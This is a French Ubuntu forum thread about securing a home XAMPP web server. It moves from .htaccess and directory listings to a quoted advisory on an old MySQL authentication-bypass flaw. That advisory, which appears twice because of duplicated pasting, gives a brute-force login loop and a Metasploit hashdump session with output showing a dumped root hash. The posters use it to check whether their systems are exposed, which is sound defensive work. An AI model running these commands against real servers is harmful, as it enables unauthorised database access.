Ubuntu-fr

athos78

XAMPP et .htaccess

Apache2...ubuntu 13.04.
Pour protéger mon fichier /opt/lampp/htdocs/mon_site/images, j'utilise .htaccess et .htpasswd que j'enregistre dans /images. Celà fonctionne, mais trop bien. En effet mon site n'affiche plus les photos. Je désire bloquer l'accès à /images lorsqu'on tape l'adresse http://mon_site/images (comme sur le site Apache Friends) mais que mon site puisse y accéder. Je crois savoir qu'il est possible d'intervenir quelque-part dans un *.conf, mais là c'est trop touffu pour moi. Merci de votre aide.

athos78

Re : XAMPP et .htaccess

Je crois avoir trouvé en fouillant dans le forum. Question posée par Alinthda le 16/05/13. Une réponse envoyée par : Abelthorne.

Sinon, un truc tout con si tu ne veux pas que le contenu du dossier s'affiche quand on y accède via un navigateur : un fichier index.html vide...

Celà fonctionne mais peut-être y-a t-il plus académique?

tiramiseb

Re : XAMPP et .htaccess

Salut,

1/ XAMPP est à éviter, c'est une usine à  gaz inutile
2/ Tu as la main sur ton serveur, les .htaccess sont alors à éviter au profit des fichiers de configuration d'Apache
3/ L'affichage de la liste des fichiers se fait avec l'option "Indexes", il faut donc ajouter "-Indexes" à la ligne "Options" qui correspond au répertoire en questions dans la configuration d'Apache.

---

Sébastien Maccagnoni - https://www.maccagnoni.eu - https://www.domotego.com

pires57

Re : XAMPP et .htaccess

moi ce qui me choque le plus c'est d'installer xampp et de se soucier de la sécurité après ....

---

Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn

xavier4811

Re : XAMPP et .htaccess

moi ce qui me choque le plus c'est d'installer xampp et de se soucier de la sécurité après ....

+10

même eux le reconnaissent :

La configuration par défaut ne convient pas au point de vue sécurité et n'est pas assez sécuritaire dans un environnement de production -- veuillez ne pas utiliser XAMPP dans un tel environnement.

athos78

Re : XAMPP et .htaccess

Merci à tiramiseb de me donner quelques solutions. Je vais voir dans ce sens. Mais si XAMPP est une "usine à gaz" what else ? dit une pub.J'essaierais volontiers autre chose. Pour ma part XAMPP s'est installé très  vite. Version installeur. Je remercie également pires57 et xavier4811 mais si j'ai fait ainsi c'est que je désirais me faire la main pour créer mon site hébergé sur un ordinateur chez moi.Donc pas de FTP. Dans cet ordinateur d'occasion il n'y a que ubuntu 13.04 et XAMPP et ceci justement pour la sécurité. Ensuite je me fais la main sur la sécurité, d'où mes questions. Mais comment le faire sans avoir installé quoique ce soit? Grosso-modo j'aimerais lire une réponse claire et non un commentaire de ce que je fais. Bien sûre que j'avais déjà lu le paragraphe apache friends, d'où mes questions. Encore merci de vos suggestions.

xavier4811

Re : XAMPP et .htaccess

Tous les logiciels nécéssaires sont dans les dépots, testés et pré-configurés a l'install pour ta distrubution

apt-cache show apache php mysql 

Si c'est juste a la maison derrière la box, la sécurité ne devrait pas être un problème si tu n'ouvre pas d'accès depuis internet.
Par contre tu aura une installation certainement plus proche de ce que tu vas trouver chez un hébergeur.
En sécurité, si possible, on commence par tout restreindre et on ouvre en fonction des besoins.
Là tu vas essayer de boucher les trous d'un gruyère fait pour du developpement sous W$, pas pour de la production.

pires57

Re : XAMPP et .htaccess

Pour ma part XAMPP s'est installé très  vite.

Oui mais de quel manière? xampp ne devrais pas être intégrer a une distribution Linux parce qu'il ne respecte déja pas l'architecture du système, je veut dire par la que /opt n'est pas une poubelle ou on peut mettre ce que l'on veut.

si j'ai fait ainsi c'est que je désirais me faire la main pour créer mon site hébergé sur un ordinateur chez moi

je vais te répondre par une autre citation de xavier4811 :

La configuration par défaut ne convient pas au point de vue sécurité et n'est pas assez sécuritaire dans un environnement de production -- veuillez ne pas utiliser XAMPP dans un tel environnement.

Donc maintenant pour proposer une solution conventionnel et sécurisé qui respecte l'architecture du système linux je te renvois ici
Si tu as des questions, n'hésites pas.

---

Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn

athos78

Re : XAMPP et .htaccess

Merci xavier4811 et pires57 pour une réponse si prompte. J'ai aussitôt cliqué sur le lien de pires57. Je l'avais essayé sans vraiment bien m'en sortir. Je pense y retourner. Mais : /opt/lampp ou /var /www puriste, je suis d'accord mais dans le fonctionnement et la sécurité y a t 'il une différence? La commande de xavier4811 je ne la connaissais pas:( apt-cache show apache php mysql)  je vais l'essayer, mais que fait-elle? Une installation? ou autre? J'ai déjà ouvert le site sur internet pour la famille et les amis et ne serait-ce également que pour voir les attaques. j'en ai déjà eu une il y a 2 nuits, signalé par le pare-feu (kerio) d'un autre PC  (XP Home, hélas) sur mon réseau. Apparemment Ubuntu a bien géré et mon site n'a pas non plus été attaqué. Ce qui bien sûr ne veut rien dire. Je pense que cette tentative vient du fait que j'ai navigué avec tor. Pourquoi? Pour contourner l'impossibilité du "loop-back". En effet pour tester mon site je l'appelais du PC XP via internet et non en local : impossible, par conséquent je suis passé par tor. Localhost c'est bien, mais c'est localhost. et là çà fonctionne. Suite à un peu de fatigue j'ai appelé mon site depuis l'ordinateur ubuntu ( via internet ) hébergeant donc mon site et là pas d'effet de loop-back. Pour résumer, je peux appeler mon IP avec ubuntu mais pas avec windows. C'est simplement que celà m'intrigue, une réponse n'est pas nécessaire mais si vous l'avez, je n'y penserai plus. Encore merci.

athos78

Re : XAMPP et .htaccess

Oups désolé xavier4811 je viens de mieux relire ta réponse."Tous les logiciels nécéssaires sont dans les dépots, testés et pré-configurés a l'install pour ta distrubution ". Ne tiens pas compte de mon dernier message.

xavier4811

Re : XAMPP et .htaccess

apt-cache show te montre juste les paquets dispos de ce nom, apt-cache search recherche dans les paquets dispos, si tu veux installer c'est

sudo apt-get install apache2 php5 mysql-server libapache2-mod-php5 php5-mysql

mais avant, fait une sauvegarde de ton travail et vide la poubelle (/opt)

La différence n'est pas dans l'emplacement, mais dans la configuration. xampp est fait pour s'installer et être utilisé en qques minutes sans tenir compte d'aucune sécurité élémentaire.
Ca doit rester ce que c'est, un outil de développement pour W$, parce qu'installer Apache Php Mysql sur W$ c'est c***t. Normal, vu que les softs en question ont été créés pour des Unix like.
Ca peut paraître plus compliqué au départ vu qu'il n'y a pas de clickodrome. En fait non, tout est dans quelques fichiers de conf dont la syntaxe est tout ce qu'il y a de plus logique.
Et il n'y a presque pas de modif a faire pour une utilisation standard après l'install.

athos78

Re : XAMPP et .htaccess

Quelle réactivité! Effectivement dans mes errements je me rappelle être passé par ta procédure d'installation. Mais je ne connaissais ni /opt, /lampp encore moins /var et /www. Je recommence donc après ménage , mes principaux fichiers sont déjà sauvegardés sur USB. Les trous de sécurités aurais-tu quelques exemples? En dehors du codage PHP des mots de passe que je n'ai pas encore appliqué vu le peu d'incidence actuellement. Complètement en-dehors du sujet comment as-tu mis ton logo en haut à gauche de tes messages? Je suis nouveau sur le site, j'ai un peu regardé mais sans trouver. Je tâcherai de mettre le mien.

xavier4811

Re : XAMPP et .htaccess

Encore une fois je n'invente rien, : http://www.apachefriends.org/fr/xampp-windows.html#1384

Une question de sécurité (LECTURE OBLIGATOIRE!)
* La console de sécurité XAMPP
Tel que mentionné auparavant, XAMPP n'est pas destiné à un usage en production mais seulement pour des développeurs dans un environnement de développement. XAMPP est configuré de façon à être le plus ouvert possible pour permettre au développeur de faire ce qu'il/elle veut. Ceci est intéressant dans un contexte de développement mais en production ceci pourrait s'avérer fatal.

Voici la liste des éléments de sécurité manquants dans XAMPP :

        L'administrateur MySQL (root) n'a pas de mot de passe.
    Le serveur MySQL est accessible depuis le réseau.
    phpMyadmin est accessible depuis le réseau.
    Les exemples sont disponibles depuis le réseau.
        L'utilisateur de Mercury et FileZilla est connu.

[*HS] pour le logo -> Profil / Personnalité [*/HS]

athos78

Re : XAMPP et .htaccess

Il me semblait avoir répondu mais je ne trouve plus trace de mon dernier message. Donc comment puis-je tester le serveur MySQL? C'est à dire que dois-je entrer au clavier, sachant que pour phpMyAdmin c'est: localhost/phpmyadmin? Re-mercie d'avance.

athos78

Re : XAMPP et .htaccess

Une importante faille de sécurité découverte:
Les systèmes suivants sont concernés :

    Ubuntu 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
    OpenSuSE 12.1 64-bit MySQL 5.5.23-log
    Debian Unstable 64-bit 5.5.23-2
    Fedora 16
    Arch Linux
    MySQL et MariaDB en version 5.1.61, 5.2.11, 5.3.5 et 5.5.22 de façon générale

En revanche, ces distributions ne semblent pas affectées :

    Red Hat Enterprise Linux 4, 5, 6 et CentOS
    Debian (Lenny, Squeeze...)
    Ubuntu Linux 32-bit (10.04, 11.10, 12.04l) Je suppose également 13.04 la mienne
    Gentoo 64-bit
    SuSE 9.3 i586 MySQL 4.1.10

xavier4811

Re : XAMPP et .htaccess

C'est quoi ta source pour la faille ?
Sur une installation normale, MySQL ne répond que sur localhost, l'accès réseau doit être interdit.
C'est un paramêtre par défaut.

$ mysql -u root 
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.1.69 Source distribution

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> quit
Bye

xavier4811

Re : XAMPP et .htaccess

Et ça c'est ce que tu devrais avoir en essayant d'un autre poste.

athos78

Re : XAMPP et .htaccess

http://www.tux-planet.fr/une-importante … urs-mysql/

Voici un exemple d'exploitation de la vulnérabilité, qui fonctionne au bout de 30 secondes :

    $ while /bin/true; do mysql -u root --password=123; done
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    ...http://www.tux-planet.fr/une-importante-faille-de-securite-pour-les-serveurs-mysql/

Voici un exemple d'exploitation de la vulnérabilité, qui fonctionne au bout de 30 secondes :

    $ while /bin/true; do mysql -u root --password=123; done
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
    ...
    ...
    mysql>
    mysql> \s
    --------------
    mysql  Ver 14.14 Distrib 5.5.23, for Linux (x86_64) using readline 5.1
    Current user:        root@localhost

Un module Metasploit est également disponible. Celui-ci est capable d'extraire le hash du mot de passe root MySQL et le recopie ensuite dans un fichier texte :

    # ./msfconsole -n
    msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
    msf > info
    msf > set USERNAME root
    msf > set RHOSTS 127.0.0.1
    msf > set RPORT 3306
    msf > run

    [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
     127.0.0.1:3306 Successfully bypassed authentication after 80 attempts
    [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
     127.0.0.1:3306 Hash Table has been saved: /root/.msf4/loot/20120611235044_default_127.0.0.1_mysql.hashes_550067.txt
     Scanned 1 of 1 hosts (100% complete)
     Auxiliary module execution completed

Si vous êtes concerné, il ne vous reste plus qu'à mettre à jour votre système rapidement.

Je ne saisis pas bien tout cela, mais ubuntu 13.04 ne semble pas concerné. Je suppose que ce site est sérieux. Je relis ton dernier message et j'essaie
quelques manips.

    ...
    mysql>
    mysql> \s
    --------------
    mysql  Ver 14.14 Distrib 5.5.23, for Linux (x86_64) using readline 5.1
    Current user:        root@localhost

Un module Metasploit est également disponible. Celui-ci est capable d'extraire le hash du mot de passe root MySQL et le recopie ensuite dans un fichier texte :

    # ./msfconsole -n
    msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
    msf > info
    msf > set USERNAME root
    msf > set RHOSTS 127.0.0.1
    msf > set RPORT 3306
    msf > run

    [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
     127.0.0.1:3306 Successfully bypassed authentication after 80 attempts
    [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
     127.0.0.1:3306 Hash Table has been saved: /root/.msf4/loot/20120611235044_default_127.0.0.1_mysql.hashes_550067.txt
     Scanned 1 of 1 hosts (100% complete)
     Auxiliary module execution completed

Si vous êtes concerné, il ne vous reste plus qu'à mettre à jour votre système rapidement.

Je ne saisis pas bien tout cela, mais ubuntu 13.04 ne semble pas concerné. Je suppose que ce site est sérieux. Je relis ton dernier message et j'essaie
quelques manips.

xavier4811

Re : XAMPP et .htaccess

$ count=0
$ while /bin/true; do count=$(expr $count + 1); echo $count; mysql -u root --password=123; done
.... bla bla ...
149477
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
149478
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
149479
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
149480
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
149481
^Z
[1]+  Stopped                 mysql -u root --password=123

depuis an, ils ont du avoir le temps de corriger la faille.

xavier4811

Re : XAMPP et .htaccess

Pour ce qui est de metasploit, c'est pas difficile a tester non plus :

athos78

Re : XAMPP et .htaccess

Merci, je verrai ces problèmes plus tard, quand mon site sera plus étoffé. J'aurai des questions très prochainement sur l'installation de noip-duc-linux.tar.gz. Mon premier essai n'a pas été fulgurant. Merci encore de ton aide je te souhaite une bonne semaine.